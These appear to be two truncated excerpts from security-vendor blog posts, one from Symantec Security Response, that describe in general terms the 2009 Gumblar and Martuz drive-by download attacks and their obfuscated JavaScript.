The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains.
The drive-by download tries to exploit a number of underlying vulnerabilities, including some...
Symantec Security Response has been monitoring a recent spate of Web-based attacks and drive-by downloads from compromised websites that are infecting end-users’ computers. This latest round of attacks has a payload that maliciously alters Web search engine results on the compromised machines. There have also been some recent blog posts and articles written about compromised websites rendering drive-by downloads, including malware, with obfuscated attacks coming from a malicious Gumblar domain in China. Yes, we have seen a short-term increase in attacks, but the reality is, this is unfortunately just another day on the Web and it reflects what we have seen in our Web Based Attacks: February 2009 whitepaper. For instance, Symantec documented attacks from more than 800,000 unique domains last year.
We have been proactively blocking these latest attacks with our network IPS in...
